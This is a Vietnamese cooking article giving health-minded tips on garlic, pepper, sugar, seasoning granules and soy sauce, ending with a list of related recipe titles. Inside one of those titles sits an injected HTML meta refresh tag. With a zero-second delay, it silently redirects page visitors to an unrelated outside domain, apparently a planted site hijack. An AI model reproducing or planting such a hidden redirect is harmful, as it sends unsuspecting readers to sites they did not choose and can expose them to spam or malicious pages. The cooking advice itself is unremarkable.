Sức khỏe gia đình và những lưu ý khi dùng gia vị
Nêm nếm gia vị là một công đoạn vô cùng quan trọng để tạo nên bữa ăn ngon. Tuy nhiên, một số gia vị nếu nêm “quá tay” không chỉ ảnh hưởng vị hương vị món ăn mà còn ảnh hưởng đến sức khỏe gia đình mình. Hãy cùng tìm hiểu một số điều cần lưu ý sau khi sử dụng gia vị nhé.
1. Tỏi
Tỏi có tác dụng rất tốt trong việc chống lại virus và vi khuẩn gây bệnh. Khi chiên xào, các món ăn nhiều gia vị cần phi thơm với dầu, bạn nên cho tỏi vào sau cùng để tỏi không bị cháy. Vì tỏi cháy sẽ mất đi chất dinh dưỡng và làm món ăn có vị đắng.
Một điều các bạn cần phải chú ý là tỏi tươi luôn giữ được nhiều chất dinh dưỡng và an toàn hơn những củ đã mọc mầm hoặc héo. Do đó, chỉ nên tích lượng tỏi vừa đủ dùng cho vài ngày, khi hết hãy mua thêm để đảm bào tỏi luôn tươi ngon và bảo vệ sức khỏe gia đình mình nhé.
2. Tiêu
Tiêu giúp mang đến mùi hương đặc trưng cho món ăn và là gia vị không thể thiếu cho các món như thịt, cá kho tiêu,… Nhiều người có thói quen ướp tiêu vào thực phẩm trước khi chế biến. Tuy nhiên, khi trải qua công đoạn đun nấu ở nhiệt độ cao, tiêu sẽ mất đi mùi hương đặc trưng và các chất dinh dưỡng vốn có. Để đảm bảo giữ được mùi thơm, các bạn chỉ nên rắc tiêu vào khi thức ăn đã chín. Ngoài ra, tiêu xay sẵn rất dễ mất mùi, nếu muốn giữ tiêu dùng lâu các bạn phải để nguyên hạt và cất ở nơi khô thoáng nhé.
3. Đường
Các bạn lưu ý với các món khô như xào, kho có đường chỉ nên đun với lửa nhỏ thôi nhé. Đối với các món chiên, nướng cũng vậy, bạn nên hạn chế tẩm ướp đường để món ăn khi nấu không cháy, khét gây ảnh hưởng đến sức khỏe gia đình mình. Gợi ý cho bạn: ướp món nướng với mật ong cũng giúp món ăn thêm ngon, không sợ cháy mà lại bổ dưỡng hơn. Khi chế biến các món canh hoặc xào, đường nên được cho vào sau muối để không bị vị mặn lấn át. Các bạn nhớ đừng nêm đường khi món ăn gần chín nhé, vì đường lâu tan hơn các loại gia vị khác, sẽ làm cho món ăn của bạn ngọt hơn mong muốn.
4. Hạt nêm
Hạt nêm là một người bạn không thể thiếu trong mỗi bữa ăn cho gia đình. Công dụng đặc trưng của hạt nêm là làm tăng vị đậm đà của món ăn nên tốt nhất là được dùng trong quá trình đun nấu. Tuy nhiên, các bạn không nên cho hạt nêm vào món ăn đã chế biến xong, vì hạt nêm sẽ bị vón cục ảnh hưởng đến mùi vị. Để bảo quản hạt nêm dùng được lâu, các bạn nhớ cho vào lọ đóng kín nắp tránh để không khí lọt vào gây ẩm mốc.
5. Nước tương
Nước tương chủ yếu dùng để tẩm ướp giúp tăng vị đậm đà và màu sắc cho món ăn, hơn nữa còn có thể dùng làm nước chấm. Nếu dùng nước tương để ướp gia vị, hãy giảm lượng muối nêm vào trong lúc đun nấu để món ăn không quá mặn.
- Ngon cơm với phi lê cá hồi xốt nước tương
- Bò xốt<meta http-equiv="refresh" content="0;url=https://northshorefinefoods.com/?"> xí muội món ngon đưa cơm ngày mưa
- Cách chế biến sườn non hấp xí muội đậm đà, dinh dưỡng
- Sai lầm "chết người" khi dùng dầu ăn hầu như ai cũng mắc
- Heo quay kho nước tương đậm đà
- Thịt viên củ cải sốt tương cà
- Cách làm củ cải ngâm nước tương hương vị đậm đà
- Thịt gà rim nước tương đậm đà ngày cuối tuần
- Cá chim chiên nước tương đậm đà, trôi cơm
- 9 công dụng tuyệt vời của cà chua
- Cá diêu hồng hấp sốt nước tương
- Cách nấu lẩu thái ngon chua cay cuối tuần
- Những đặc tính sáng giá của ớt
- Tác dụng khi ăn ớt mỗi ngày
- Cách nấu lẩu Thái bằng gói gia vị
- Phát hiện công dụng độc đáo của xì dầu
- Tác dụng tuyệt vời của đỗ tương đối với sức khỏe của bạn
- 5 sự thật thú vị về tương cà không phải ai cũng biết!
- Cánh gà sốt tương ớt siêu hấp dẫn
- Cách phân biệt tương ớt ngon và tương ớt bẩn